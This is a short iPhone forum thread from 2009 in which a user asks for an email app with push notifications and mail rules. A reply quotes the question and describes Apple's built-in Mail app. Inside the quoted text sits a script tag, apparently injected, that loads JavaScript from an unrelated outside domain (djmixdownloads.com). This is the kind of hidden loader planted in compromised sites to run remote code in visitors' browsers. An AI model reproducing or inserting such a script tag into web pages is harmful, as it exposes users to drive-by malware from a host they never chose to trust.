Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Email APP

iPhoneaholic
    Thanks

Exclamation Email APP
    I hope this is the correct place to ask this question

I am looking for a email app that has the push notification like the normal mail. I like ibis mail but it does not have the push. I have to open it to check for mail also. I want a mail program that lets me make rules like ibis does but still has the features that the normal mail has. Does anyone know of any other mail programs I could try out even? Thanks for any help you can give.
    Last edited by JJMA; 08-07-2009 at 03:21 PM.

Quote Originally Posted by JJMA View Post
    I hope this is the correct place to ask this question

I am looking for a email app that has the push notification like the normal mail. I like ibis mail but it does not have the push. I have to open it to check for mail also. I want a mail program that lets me make rules like ibis does but still has the features that the normal mail has. Does anyone know of any other mail programs I could try out even? Thanks for any help you can give.<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    Mail is a rich HTML email client on iPhone and iPod touch that works with the most popular email systems including Yahoo!, Gmail (from Google), AOL, and MobileMe from Apple in addition to most industry-standard POP3, IMAP, and Microsoft Exchange email systems. Mail lets you send and receive photos and graphics, which are displayed in your message along with the text. Mail also allows you to view PDF, Microsoft Word, Excel and other attachments on iPhone or iPod touch.